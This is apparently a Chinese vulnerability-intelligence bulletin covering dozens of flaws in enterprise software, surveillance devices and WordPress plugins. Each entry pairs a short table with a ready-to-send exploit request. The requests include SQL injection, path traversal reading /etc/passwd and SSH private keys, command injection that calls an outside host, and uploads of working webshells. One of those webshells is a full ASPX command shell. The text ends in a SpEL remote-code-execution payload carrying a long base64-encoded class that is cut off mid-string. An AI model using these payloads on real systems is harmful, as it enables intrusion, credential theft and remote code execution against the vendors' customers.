feed/jsp/vtnifpvi.js" Content-Type: image/jpeg
GIF89a 123123123
---WebKitFormBoundaryxegqoxxi--
TVT
TVT DVR接口queryDevInfo存在信息泄漏(CVE-2024-7339)
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 信息泄露 |
未知 |
/queryDevInfo |
WAF封禁路路径,等待发布补丁 |
807 |
nday |
漏洞详情
curl -X POST "http://ip/queryDevInfo" \
-H "Accept-Language: en-US,en;q=0.9" \
-H "Accept-Encoding: gzip, deflate" \
-H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" \
-H "Upgrade-Insecure-Requests: 1" \
-H "Connection: keep-alive" \
-H "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS like Mac OS X) AppleWebKit (KHTML, like Gecko) Version Mobile Safari" \
-H "Content-Length: 103" \
-d '<?xml version="1.0" encoding="utf-8" ?><request version="1.0" systemType="NVMS-9000" clientType="WEB"/>'
信呼
Xinhu RockOA v2.6.2存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/index.php |
WAF封禁路路径,等待发布补丁 |
807 |
nday |
漏洞详情
GET /index.php?m=openmodhetong|openapi&d=task&a=data&ajaxbool=0&nickName=MScgYW5kIHNsZWVwKDUpIw== HTTP/1.1
满客宝
满客宝后台管理系统downloadWebFile存在任意文件读取漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
未知 |
/base/api/v1/kitchenVideo/downloadWebFile.swagger |
WAF封禁路路径,等待发布补丁 |
807 |
nday |
漏洞详情
GET /base/api/v1/kitchenVideo/downloadWebFile.swagger?fileName=&ossKey=/../../../../../../../../../../../etc/passwd HTTP/1.1
满客宝智慧食堂系统selectUserByOrgId存在未授权访问漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
未知 |
/yuding/selectUserByOrgId.action |
WAF封禁路路径,等待发布补丁 |
807 |
nday |
漏洞详情
GET /yuding/selectUserByOrgId.action?record= HTTP/1.1
亿华
亿华考勤管理系统unloadfile.ashx存在任意文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/handle/unloadfile.ashx |
WAF封禁路路径,等待发布补丁 |
807 |
nday |
漏洞详情
POST /handle/unloadfile.ashx HTTP/1.1
-----------------------------sadasd897729dhwaiuhqqwe123
test
-----------------------------sadasd897729dhwaiuhqqwe123
unloadfile
-----------------------------sadasd897729dhwaiuhqqwe123
./
-----------------------------sadasd897729dhwaiuhqqwe123—
WordPress
WordPress Dokan Pro 插件未授权SQL 注入
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/wp-admin/admin.php?webhook=dokan-moip |
WAF封禁路路径,等待发布补丁 |
807 |
nday |
漏洞详情
POST /wp-admin/admin.php?webhook=dokan-moip HTTP/1.1
Host:
{"env":"1","event":"invoice.created","resource":{"subscription_code":"11111' and(select 1 from (select sleep( if(1=1,6,0) ))x )='"}}
飞企互联
飞企互联 FE 协作办公平台 SQL 注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/witapprovemanage/apprvaddNew |
WAF封禁路路径,等待发布补丁 |
807 |
1day |
漏洞详情
POST /witapprovemanage/apprvaddNew.j%73p HTTP/1.1
Host:
flowid=1';WAITFOR+DELAY+'0:0:5'--+
真内控
真内控国产化开发平台 preview 任意文件读取漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
未知 |
/print/billPdf/preview |
WAF封禁路路径,等待发布补丁 |
807 |
1day |
漏洞详情
GET /print/billPdf/preview?urlPath=../../../../../../../../../../../../../../etc/passwd
HTTP/1.1
Host:
碧海威
碧海威 L7 云路由无线运营版 confirm.php/jumper.php命令注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/notice/jumper.php |
WAF封禁路路径,等待发布补丁 |
807 |
1day |
漏洞详情
GET /notice/jumper.php?t=;curl%20http%3A%2F%2Fexample%2Ecom%2F
HTTP/1.1
飞鱼星
飞鱼星 命令执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/send_order.cgi |
WAF封禁路路径,等待发布补丁 |
807 |
1day |
漏洞详情
POST /send_order.cgi?parameter=operation HTTP/1.1
Host:
{"opid":"777777777777777777","name":";echo 'test' > 123.txt;echo","type":"rest"}
世邦通信
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/php/addmediadata.php |
WAF封禁路路径,等待发布补丁 |
807 |
1day |
漏洞详情
POST /php/addmediadata.php HTTP/1.1
AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16Content-Length: 514
--de3b7a45ced9f35720e192ff54eb83908644f0ec70b3dc6fb19b6b5f0828
../--de3b7a45ced9f35720e192ff54eb83908644f0ec70b3dc6fb19b6b5f0828
/--de3b7a45ced9f35720e192ff54eb83908644f0ec70b3dc6fb19b6b5f0828
<?php echo md5(1);unlink(__FILE__);?>
--de3b7a45ced9f35720e192ff54eb83908644f0ec70b3dc6fb19b6b5f0828--
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/php/addmediadata.php |
WAF封禁路路径,等待发布补丁 |
808 |
nday |
漏洞详情
POST /php/addmediadata.php HTTP/1.1
Host:
--de3b7a45ced9f35720e192ff54eb83908644f0ec70b3dc6fb19b6b5f0828
../
--de3b7a45ced9f35720e192ff54eb83908644f0ec70b3dc6fb19b6b5f0828
/
--de3b7a45ced9f35720e192ff54eb83908644f0ec70b3dc6fb19b6b5f0828
<?php echo md5(1);unlink(__FILE__);?>
--de3b7a45ced9f35720e192ff54eb83908644f0ec70b3dc6fb19b6b5f0828--
方天云
方天云智慧平台系统 Upload.ashx 任意文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/Upload.ashx |
WAF封禁路路径,等待发布补丁 |
807 |
1day |
漏洞详情
POST /Upload.ashx HTTP/1.1
Host:
boundary=----WebKitFormBoundarySl8siBbmVicABvTX
------WebKitFormBoundarySl8siBbmVicABvTX
<%@Page Language="C#"%><%Response.Write(now())%>
------WebKitFormBoundarySl8siBbmVicABvTX--
方天云ERP系统SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/AjaxMethods.asmx/GetSalQuatation |
WAF封禁路路径,等待发布补丁 |
807 |
0day |
漏洞详情
POST /AjaxMethods.asmx/GetSalQuatation HTTP/1.1
{ID:""(SELECT CHAR(113)+CHAR(120)+CHAR(122)+CHAR(112)+CHAR(113)+(CASE WHEN (8725=8725) THEN @@VERSION ELSE CHAR(48) END)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(106)+CHAR(113))""}"
方天云-智慧平台系统-任意文件上传
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/Data/setImg.ashx |
WAF封禁路路径,等待发布补丁 |
0819 |
1day |
利用路径
POST /Data/setImg.ashx HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=----21909179191068471382830692394
Connection: close
------21909179191068471382830692394
Content-Disposition: form-data; name="Filedata"; filename="asd.aspx"
Content-Type: image/jpeg
<%@ Page Language="Jscript" validateRequest="false" %><%var c=new System.Diagnostics.ProcessStartInfo("cmd");var e=new System.Diagnostics.Process();var out:System.IO.StreamReader,EI:System.IO.StreamReader;c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=true;e.StartInfo=c;c.Arguments="/c " + Request.Item["cmd"];e.Start();out=e.StandardOutput;EI=e.StandardError;e.Close();Response.Write(out.ReadToEnd() + EI.ReadToEnd());System.IO.File.Delete(Request.PhysicalPath);Response.End();%>
------21909179191068471382830692394--
会捷通
会捷通云视讯 fileDownload 任意文件读取漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
未知 |
/fileDownload?action=downloadBackupFile |
WAF封禁路路径,等待发布补丁 |
807 |
nday |
漏洞详情
POST /fileDownload?action=downloadBackupFile HTTP/1.1
Host:
fullPath=%2Fetc%2Fpasswd
章管家
章管家 前台任意文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/api/personSeal_jdy/saveUser.htm |
WAF封禁路路径,等待发布补丁 |
807 |
1day |
漏洞详情
POST /api/personSeal_jdy/saveUser.htm HTTP/1.1
Host:
{"op":{},"data":{"mobile":"13333333333","uid":"13333333333","password":"123456","name":"testuser","return_url":"https://www.baidu.com","apisecretkey":"1","_id":"1","mail_address":"111@qq.com"},"b7o4ntosbfp":"="}
POST /seal/sealApply/uploadFileByChunks.htm?token=dingtalk_token&person_id=40288053800311e80180261b92ab005e&chunk=1&chunks=1&guid=1 HTTP/1.1
Host:
----------952870761
<%@ page import="java.io.File" %>
<%
out.println("111");
String filePath = application.getRealPath(request.getServletPath());
out.println(filePath);
new File(filePath).delete();
%>
----------952870761--
BladeX
BladeX企业级开发平台 notice/list SQL 注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/api/blade-desk/notice/list |
WAF封禁路路径,等待发布补丁 |
807 |
nday |
漏洞详情
GET /api/blade-desk/notice/list?updatexml(1,concat(0x7e,user(),0x7e),1)=1 HTTP/1.1
SpringBlade系统usual接口存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/api/blade-log/usual/list |
WAF封禁路路径,等待发布补丁 |
808 |
nday |
漏洞详情
GET /api/blade-log/usual/list?updatexml(1,concat(0x7e,user(),0x7e),1)=1 HTTP/1.1
Panabit
Panabit Panalog /Maintain/sprog_upstatus.phpSQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/Maintain/sprog_upstatus.php |
WAF封禁路路径,等待发布补丁 |
807 |
nday |
漏洞详情
GET /Maintain/sprog_upstatus.php?status=1&id=1%20and%20updatexml(1,concat(0x7e,user()),0)&rdb=1 HTTP/1.1
启业云
启业云运维平台 未授权创建管理员用户漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
未知 |
/user/register/init |
WAF封禁路路径,等待发布补丁 |
807 |
nday |
漏洞详情
GET /user/register/init HTTP/1.1
Host:
小狐狸
小狐狸Chatgpt付费创作系统存在任意文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/web.php/video/uploadMedia |
WAF封禁路路径,等待发布补丁 |
807 |
nday |
漏洞详情
POST /web.php/video/uploadMedia HTTP/1.1
------WebKitFormBoundaryhp8gBUbCczcaLGAa
你的图片数据
<?php phpinfo();?>
------WebKitFormBoundaryhp8gBUbCczcaLGAa--
3C
3C环境自动监测监控系统ReadLog文件读取漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
未知 |
/ajax/sys/LogService.ashx |
WAF封禁路路径,等待发布补丁 |
807 |
nday |
漏洞详情
GET /ajax/sys/LogService.ashx?Method=ReadLog&FileName=../web.config HTTP/1.1
AspCMS
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/plug/comment/commentList.asp |
WAF封禁路路径,等待发布补丁 |
807 |
nday |
漏洞详情
/plug/comment/commentList.asp?id=-1%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now(),null,1%20%20frmasterom%20{prefix}user
ClusterControl
ClusterControl存在任意文件读取漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
未知 |
/../../../../../../../../..//root/.ssh/id_rsa |
WAF封禁路路径,等待发布补丁 |
807 |
nday |
漏洞详情
GET /../../../../../../../../..//root/.ssh/id_rsa HTTP/1.1
契约锁
契约锁电子签章平台ukeysign存在远程命令执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/contract/ukeysign/.%2e/.%2e/template/param/edits |
WAF封禁路路径,等待发布补丁 |
807 |
nday |
漏洞详情
POST /contract/ukeysign/.%2e/.%2e/template/param/edits HTTP/1.1
{"id":"2","params":[{"expression":"var a=new
org.springframework.expression.spel.standard.SpelExpressionParser();var b='SpEL 表达式的 base64 编
码';var b64=java.util.Base64.getDecoder();var deStr=new java.lang.String(b64.decode(b),'UTF-
8');var c=a.parseExpression(deStr);c.getValue();"}]}
契约锁电子签章平台 /param/edits 远程代码执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/param/edits |
WAF封禁路路径,等待发布补丁 |
0813 |
nday |
漏洞详情
POST /contract/ukeysign/.%2e/.%2e/template/param/edits HTTP/1.1
{"id":"2","params":[{"expression":"var a=new org.springframework.expression.spel.standard.SpelExpressionParser();var b='VCAob3JnLnNwcmluZ2ZyYW1ld29yay5jZ2xpYi5jb3JlLlJlZmxlY3RVdGlscykuZGVmaW5lQ2xhc3MoIlF5c1Rlc3QiLFQgKG9yZy5zcHJpbmdmcmFtZXdvcmsudXRpbC5CYXNlNjRVdGlscykuIGRlY29kZUZyb21TdHJpbmcoInl2NjZ2Z0FBQURJQktBb0FJUUNXQ0FDWENnQ1lBSmtLQUpnQW1nb0Ftd0NjQ0FDZENnQ2JBSjRIQUo4SUFLQUlBS0VJQUtJSUFLTUtBQjhBcEFvQXBRQ21DQUNuQ2dDWUFLZ0tBS1VBcVFjQWd3b0FtQUNxQ0FDckNnQXNBS3dLQUNFQXJRb0FId0NxQ0FDdUNnQWZBSzhLQUxBQXFnZ0FzUW9BTEFDeUNBQ3pDQUMwQndDMUNnQWZBTFlIQUxjS0FMZ0F1UWdBdWdjQXV3Z0F2QWdBdlFjQXZnb0FKd0MvQ2dBbkFNQUtBQ2NBd1FnQXdnY0F3d2dBeEFnQXhRa0F4Z0RIQ2dER0FNZ0lBTWtIQU1vSUFNc0lBTXdJQU0wS0FNNEF6d29BTEFEUUNBRFJDQURTQ0FEVENBRFVDQURWQndEV0NnRFhBTmdLQU5jQTJRb0EyZ0RiQ2dBOUFOd0lBTjBLQUQwQTNnb0FQUURmQndEZ0NnQkZBSllJQU9FS0FDd0E0Z29BUlFEakNBRGtDQURsQndEbUNnQk1BT2NJQU9nSEFPa0JBQVk4YVc1cGRENEJBQU1vS1ZZQkFBUkRiMlJsQVFBUFRHbHVaVTUxYldKbGNsUmhZbXhsQVFBU1RHOWpZV3hXWVhKcFlXSnNaVlJoWW14bEFRQUVkR2hwY3dFQUNVeFJlWE5VWlhOME93RUFDR1J2U1c1cVpXTjBBUUFVS0NsTWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzQkFBVjJZWEl5T0FFQUlreHFZWFpoTDJ4aGJtY3ZRMnhoYzNOT2IzUkdiM1Z1WkVWNFkyVndkR2x2YmpzQkFBVjJZWEl5TmdFQUdVeHFZWFpoTDJ4aGJtY3ZjbVZtYkdWamRDOUdhV1ZzWkRzQkFBVjJZWEl5TndFQUlVeHFZWFpoTDJ4aGJtY3ZUbTlUZFdOb1RXVjBhRzlrUlhoalpYQjBhVzl1T3dFQUJYWmhjak14QVFBRmRtRnlNeklCQUJKTWFtRjJZUzlzWVc1bkwwOWlhbVZqZERzQkFBVjJZWEl6TXdFQUJYSmxjRzl1QVFBRGMzUnlBUUFTVEdwaGRtRXZiR0Z1Wnk5VGRISnBibWM3QVFBRVkyMWtjd0VBRTF0TWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzQkFBbHlaWE4xYkhSVGRISUJBQVpsYm1OdlpHVUJBQVYyWVhJek1BRUFCWFpoY2pJNUFRQUJTUUVBQlhaaGNqSXhBUUFGZG1GeU1qSUJBQVYyWVhJeU13RUFCWFpoY2pJMEFRQUZkbUZ5TWpVQkFBVjJZWEkzT0FFQUZVeHFZWFpoTDNWMGFXd3ZRWEp5WVhsTWFYTjBPd0VBQlhaaGNqSXdBUUFGZG1GeU1Ua0JBQkpNYW1GMllTOXNZVzVuTDFSb2NtVmhaRHNCQUFWMllYSXhPQUVBQkhaaGNqZ0JBQVIyWVhJNUFRQVhUR3BoZG1FdmJHRnVaeTlEYkdGemMweHZZV1JsY2pzQkFBVjJZWEl4TUFFQUVVeHFZWFpoTDJ4aGJtY3ZRMnhoYzNNN0FRQUZkbUZ5TVRFQkFBVjJZWEl4TWdFQUJYWmhjakV6QVFBRmRtRnlNVFFCQUFWMllYSXhOUUVBQlhaaGNqRTJBUUFUVzB4cVlYWmhMMnhoYm1jdlZHaHlaV0ZrT3dFQUJYWmhjakUzQVFBQldnRUFGVXhxWVhaaEwyeGhibWN2UlhoalpYQjBhVzl1T3dFQUEyMXpad0VBRFZOMFlXTnJUV0Z3VkdGaWJHVUhBTU1IQU9vSEFPc0hBSjhIQUxVSEFPd0hBTGNIQUxzSEFMNEhBR2NIQU9ZQkFBcFRiM1Z5WTJWR2FXeGxBUUFNVVhselZHVnpkQzVxWVhaaERBQlFBRkVCQUFWemRHRnlkQWNBNmd3QTdRRHVEQUR2QVBBSEFPc01BUEVBOEFFQUhXOXlaeTVoY0dGamFHVXVZMjk1YjNSbExsSmxjWFZsYzNSSmJtWnZEQUR5QVBNQkFDQnFZWFpoTDJ4aGJtY3ZRMnhoYzNOT2IzUkdiM1Z1WkVWNFkyVndkR2x2YmdFQUVHcGhkbUV1YkdGdVp5NVVhSEpsWVdRQkFCVnFZWFpoTG14aGJtY3VWR2h5WldGa1IzSnZkWEFCQUNKdmNtY3VZWEJoWTJobExtTnZlVzkwWlM1U1pYRjFaWE4wUjNKdmRYQkpibVp2QVFBSGRHaHlaV0ZrY3d3QTlBRDFCd0RzREFEMkFQY0JBQVowWVhKblpYUU1BUGdBK1F3QStnRDdEQUQ4QUZnQkFBUm9kSFJ3REFEOUFQNE1BUDhCQUFFQUNVVnVaSEJ2YVc1MEpBd0JBUUVDQndFREFRQWFiM0puTG1Gd1lXTm9aUzUwYjIxallYUXVkWFJwYkM1dVpYUU1BUVFCQlFFQUJuUm9hWE1rTUFFQUNtZGxkRWhoYm1Sc1pYSUJBQTlxWVhaaEwyeGhibWN2UTJ4aGMzTU1BUVlCQndFQUVHcGhkbUV2YkdGdVp5OVBZbXBsWTNRSEFRZ01BUWtCQ2dFQUNXZGxkRWRzYjJKaGJBRUFIMnBoZG1FdmJHRnVaeTlPYjFOMVkyaE5aWFJvYjJSRmVHTmxjSFJwYjI0QkFBWm5iRzlpWVd3QkFBcHdjbTlqWlhOemIzSnpBUUFUYW1GMllTOTFkR2xzTDBGeWNtRjVUR2x6ZEF3QkN3RU1EQUVOQVE0TUFQb0JEd0VBRTJkbGRGZHZjbXRsY2xSb2NtVmhaRTVoYldVQkFCQnFZWFpoTDJ4aGJtY3ZVM1J5YVc1bkFRQURjbVZ4QVFBSFoyVjBUbTkwWlFjQkVBd0JFUUI4REFFU0FSTUJBQXRuWlhSU1pYTndiMjV6WlFFQUVsdE1hbUYyWVM5c1lXNW5MME5zWVhOek93RUFDV2RsZEVobFlXUmxjZ0VBQjFndFUzUmhkR1VCQUFkdmN5NXVZVzFsQndFVURBRVZBUllNQVJjQVdBRUFCbmRwYm1SdmR3RUFCMk50WkM1bGVHVUJBQUl2WXdFQUJ5OWlhVzR2YzJnQkFBSXRZd0VBRVdwaGRtRXZkWFJwYkM5VFkyRnVibVZ5QndFWURBRVpBUm9NQVJzQkhBY0JIUXdCSGdFZkRBQlFBU0FCQUFKY1FRd0JJUUVpREFFakFGZ0JBQlp6ZFc0dmJXbHpZeTlDUVZORk5qUkZibU52WkdWeUFRQUZWVlJHTFRnTUFTUUJKUXdBYVFFbUFRQUpZV1JrU0dWaFpHVnlBUUFIYzNWalkyVnpjd0VBRTJwaGRtRXZiR0Z1Wnk5RmVHTmxjSFJwYjI0TUFTY0FVUUVBQldWeWNtOXlBUUFIVVhselZHVnpkQUVBRUdwaGRtRXZiR0Z1Wnk5VWFISmxZV1FCQUJWcVlYWmhMMnhoYm1jdlEyeGhjM05NYjJGa1pYSUJBQmRxWVhaaEwyeGhibWN2Y21WbWJHVmpkQzlHYVdWc1pBRUFEV04xY25KbGJuUlVhSEpsWVdRQkFCUW9LVXhxWVhaaEwyeGhibWN2VkdoeVpXRmtPd0VBRldkbGRFTnZiblJsZUhSRGJHRnpjMHh2WVdSbGNnRUFHU2dwVEdwaGRtRXZiR0Z1Wnk5RGJHRnpjMHh2WVdSbGNqc0JBQWxuWlhSUVlYSmxiblFCQUFsc2IyRmtRMnhoYzNNQkFDVW9UR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdLVXhxWVhaaEwyeGhibWN2UTJ4aGMzTTdBUUFRWjJWMFJHVmpiR0Z5WldSR2FXVnNaQUVBTFNoTWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzcFRHcGhkbUV2YkdGdVp5OXlaV1pzWldOMEwwWnBaV3hrT3dFQURYTmxkRUZqWTJWemMybGliR1VCQUFRb1dpbFdBUUFPWjJWMFZHaHlaV0ZrUjNKdmRYQUJBQmtvS1V4cVlYWmhMMnhoYm1jdlZHaHlaV0ZrUjNKdmRYQTdBUUFEWjJWMEFRQW1LRXhxWVhaaEwyeGhibWN2VDJKcVpXTjBPeWxNYW1GMllTOXNZVzVuTDA5aWFtVmpkRHNCQUFkblpYUk9ZVzFsQVFBSVkyOXVkR0ZwYm5NQkFCc29UR3BoZG1FdmJHRnVaeTlEYUdGeVUyVnhkV1Z1WTJVN0tWb0JBQWhuWlhSRGJHRnpjd0VBRXlncFRHcGhkbUV2YkdGdVp5OURiR0Z6Y3pzQkFBcG5aWFJRWVdOcllXZGxBUUFWS0NsTWFtRjJZUzlzWVc1bkwxQmhZMnRoWjJVN0FRQVJhbUYyWVM5c1lXNW5MMUJoWTJ0aFoyVUJBQVpsY1hWaGJITUJBQlVvVEdwaGRtRXZiR0Z1Wnk5UFltcGxZM1E3S1ZvQkFBbG5aWFJOWlhSb2IyUUJBRUFvVEdwaGRtRXZiR0Z1Wnk5VGRISnBibWM3VzB4cVlYWmhMMnhoYm1jdlEyeGhjM003S1V4cVlYWmhMMnhoYm1jdmNtVm1iR1ZqZEM5TlpYUm9iMlE3QVFBWWFtRjJZUzlzWVc1bkwzSmxabXhsWTNRdlRXVjBhRzlrQVFBR2FXNTJiMnRsQVFBNUtFeHFZWFpoTDJ4aGJtY3ZUMkpxWldOME8xdE1hbUYyWVM5c1lXNW5MMDlpYW1WamREc3BUR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdBUUFGWTJ4dmJtVUJBQlFvS1V4cVlYWmhMMnhoYm1jdlQySnFaV04wT3dFQUJITnBlbVVCQUFNb0tVa0JBQlVvU1NsTWFtRjJZUzlzWVc1bkwwOWlhbVZqZERzQkFCRnFZWFpoTDJ4aGJtY3ZTVzUwWldkbGNnRUFCRlJaVUVVQkFBZDJZV3gxWlU5bUFRQVdLRWtwVEdwaGRtRXZiR0Z1Wnk5SmJuUmxaMlZ5T3dFQUVHcGhkbUV2YkdGdVp5OVRlWE4wWlcwQkFBdG5aWFJRY205d1pYSjBlUUVBSmloTWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzcFRHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN0FRQUxkRzlNYjNkbGNrTmhjMlVCQUJGcVlYWmhMMnhoYm1jdlVuVnVkR2x0WlFFQUNtZGxkRkoxYm5ScGJXVUJBQlVvS1V4cVlYWmhMMnhoYm1jdlVuVnVkR2x0WlRzQkFBUmxlR1ZqQVFBb0tGdE1hbUYyWVM5c1lXNW5MMU4wY21sdVp6c3BUR3BoZG1FdmJHRnVaeTlRY205alpYTnpPd0VBRVdwaGRtRXZiR0Z1Wnk5UWNtOWpaWE56QVFBT1oyVjBTVzV3ZFhSVGRISmxZVzBCQUJjb0tVeHFZWFpoTDJsdkwwbHVjSFYwVTNSeVpXRnRPd0VBR0NoTWFtRjJZUzlwYnk5SmJuQjFkRk4wY21WaGJUc3BWZ0VBREhWelpVUmxiR2x0YVhSbGNnRUFKeWhNYW1GMllTOXNZVzVuTDFOMGNtbHVaenNwVEdwaGRtRXZkWFJwYkM5VFkyRnVibVZ5T3dFQUJHNWxlSFFCQUFoblpYUkNlWFJsY3dFQUZpaE1hbUYyWVM5c1lXNW5MMU4wY21sdVp6c3BXMElCQUJZb1cwSXBUR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdBUUFQY0hKcGJuUlRkR0ZqYTFSeVlXTmxBQ0VBVHdBaEFBQUFBQUFDQUFFQVVBQlJBQUVBVWdBQUFDOEFBUUFCQUFBQUJTcTNBQUd4QUFBQUFnQlRBQUFBQmdBQkFBQUFDUUJVQUFBQURBQUJBQUFBQlFCVkFGWUFBQUFKQUZjQVdBQUJBRklBQUFjaUFBWUFJQUFBQXVrU0FrdTRBQU5NSzdZQUJMWUFCVTBzRWdhMkFBZFhwd0FKVGl1MkFBUk5MQklKdGdBSFRpd1NDcllBQnpvRUxCSUd0Z0FIT2dVc0VndTJBQWM2QmhrRUVneTJBQTA2QnhrSEJMWUFEaTBTRDdZQURUb0lHUWdFdGdBT0dRY3J0Z0FRdGdBUndBQVN3QUFTd0FBU3dBQVNPZ2tETmdvRE5nc1ZDeGtKdnFJQ1hCa0pGUXN5T2d3WkRNWUNTaGtNdGdBVEVoUzJBQldaQWowWkNCa010Z0FST2cwWkRjWUNMeGtOdGdBV3RnQVhFaGkyQUJXWkFoOFpEYllBRnJZQUdiWUFHaElidGdBY21RSU1HUTIyQUJZU0hiWUFEVG9PR1E0RXRnQU9HUTRaRGJZQUVUb1BHUSsyQUJZU0hnTzlBQisyQUNBWkR3TzlBQ0cyQUNJNkVBRTZFUmtRdGdBV0VpTUR2UUFmdGdBZ0dSQUR2UUFodGdBaU9oR25BQ0E2RWhrUXRnQVdFaVcyQUEwNkV4a1RCTFlBRGhrVEdSQzJBQkU2RVJrR0VpYTJBQTA2RWhrU0JMWUFEaGtTR1JHMkFCSEFBQ2M2RXhrVHRnQW93QUFuT2hRRE5oVVZGUmtVdGdBcG9nRmlHUlFWRmJZQUtqb1dHUmJHQVU0WkJSSXJBNzBBSDdZQUlCa1dBNzBBSWJZQUlzQUFMRG9YR1JmR0FUQVpGN2dBQTdZQUU3WUFISmtCSWhrRkVpMjJBQTA2R0JrWUJMWUFEaGtZR1JhMkFCRTZHUmtadGdBV0VpNEV2UUFmV1FPeUFDOVR0Z0FnR1JrRXZRQWhXUU1FdUFBd1U3WUFJam9hR1JxMkFCWVNNUU85QUIvQUFESzJBQ0FaR2dPOUFDRzJBQ0k2R3hrWnRnQVdFak1FdlFBZldRTVRBQ3hUdGdBZ0dSa0V2UUFoV1FNU05GTzJBQ0xBQUN3NkhCSTF1QUEydGdBM0VqaTJBQldaQUJrR3ZRQXNXUU1TT1ZOWkJCSTZVMWtGR1J4VHB3QVdCcjBBTEZrREVqdFRXUVFTUEZOWkJSa2NVem9kdXdBOVdiZ0FQaGtkdGdBL3RnQkF0d0JCRWtLMkFFTzJBRVE2SHJzQVJWbTNBRVlaSGhKSHRnQkl0Z0JKT2g4Wkc3WUFGaEpLQmIwQUgxa0RFd0FzVTFrRUV3QXNVN1lBSUJrYkJiMEFJVmtERWpSVFdRUVpIbE8yQUNKWEJEWUtwd0FKaEJVQnAvNmFGUXFaQUFhbkFBbUVDd0duL2FJU1MwdW5BQXRNSzdZQVRSSk9TeXF3QUFNQUR3QVdBQmtBQ0FFQkFSb0JIUUFrQUFNQzNBTGZBRXdBQXdCVEFBQUJBZ0JBQUFBQUN3QURBQTRBQndBUEFBOEFFZ0FXQUJVQUdRQVRBQm9BRkFBZkFCY0FKZ0FZQUM0QUdRQTJBQm9BUGdBYkFFY0FIQUJOQUIwQVZRQWVBRnNBSHdCeUFDQUFkUUFpQUlBQUl3Q0hBQ1FBbVFBbEFLSUFKZ0RLQUNjQTFnQW9BTndBS1FEbEFDb0EvZ0FyQVFFQUxnRWFBRE1CSFFBdkFSOEFNQUVyQURFQk1RQXlBVG9BTlFGREFEWUJTUUEzQVZVQU9BRmZBRG9CYkFBN0FYVUFQQUY2QUQwQmt3QStBYVlBUHdH